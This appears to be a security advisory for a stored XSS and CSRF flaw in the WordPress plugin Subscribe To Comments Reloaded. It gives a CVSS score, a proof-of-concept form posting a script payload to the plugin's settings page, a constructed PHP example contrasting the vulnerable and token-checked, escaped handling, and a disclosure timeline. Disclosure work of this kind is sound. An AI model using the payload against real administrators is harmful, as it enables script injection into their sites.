Advisory:

Stored XSS and CSRF vulnerabilities in Subscribe To Comments Reloaded 140129

Vulnerability

Last revised:

This plugin contains a combined XSS/CSRF vulnerability. Because the XSS is stored, browsers like Chrome, which implement anti-XSS measures, are equally at risk.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

Score: 6.8 (Medium)
Vector: Network
Complexity: Medium
Authentication: None
Confidentiality: Partial
Integrity: Partial
Availability: Partial

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Entice an administrative user to submit the following form:

<form action="http://localhost/wp-admin/admin.php?page=subscribe-to-comments-reloaded/options/index.php&subscribepanel=3" method="post">
  <input type="text" name="options[manager_page]" id="manager_page" value="&quot;><script>alert(1)</script>">
  <input type="submit">
</form>

An alert will be displayed on this plugin’s settings page.
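
The two flaws this proof of concept combines, shown as an added stand-alone PHP example that is not the plugin's code or its actual fix: a settings handler that accepts a POST without a per-session token, and a stored value echoed into an attribute without escaping. The names SECRET, render_field, issue_token, save_manager_page and the `_token` field are hypothetical; the payload is the one from the form above.

```php
<?php
const SECRET = 'constructed-demo-key'; // constructed value; a real site uses a per-install secret

// XSS half: the stored option is echoed into a value="..." attribute.
function render_field(string $stored, bool $escape): string {
    // In WordPress the escaping branch would be esc_attr($stored).
    $v = $escape ? htmlspecialchars($stored, ENT_QUOTES, 'UTF-8') : $stored;
    return '<input type="text" name="options[manager_page]" value="' . $v . '">';
}

// CSRF half: a token bound to the admin's session and to this action.
// In WordPress this role is played by wp_nonce_field() and check_admin_referer().
function issue_token(string $sessionId, string $action): string {
    return hash_hmac('sha256', $sessionId . '|' . $action, SECRET);
}

function save_manager_page(array $post, string $sessionId, array &$store): bool {
    $expected = issue_token($sessionId, 'save-options');
    $given = $post['_token'] ?? '';
    if (!is_string($given) || !hash_equals($expected, $given)) {
        return false; // cross-site POST without a valid token: nothing is stored
    }
    $value = $post['options']['manager_page'] ?? '';
    if (!is_string($value)) {
        return false;
    }
    $store['manager_page'] = $value;
    return true;
}

$payload = '"><script>alert(1)</script>'; // the form value once the browser decodes &quot;
$store = [];

// 1. The advisory's form carries no token, so the hardened handler refuses it.
$forged = ['options' => ['manager_page' => $payload]];
var_dump(save_manager_page($forged, 'sess-123', $store));

// 2. A request from the real settings page carries the token and is accepted.
$legit = $forged + ['_token' => issue_token('sess-123', 'save-options')];
var_dump(save_manager_page($legit, 'sess-123', $store));

// 3. Output escaping is still needed: compare how the stored value renders.
echo render_field($store['manager_page'], false), "\n"; // quote closes the attribute early
echo render_field($store['manager_page'], true), "\n";  // value stays inside the attribute
```

Either control alone leaves a gap: the token stops the cross-site write, while escaping on output protects against hostile values that reach storage by any other route.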

Advisory timeline

  • 2014-02-04: Identified
  • 2014-02-18: Reported to plugins@wordpress.org
  • 2014-03-10: Updated version discovered which reports this issue fixed.

Mitigation/further actions

Upgrade immediately.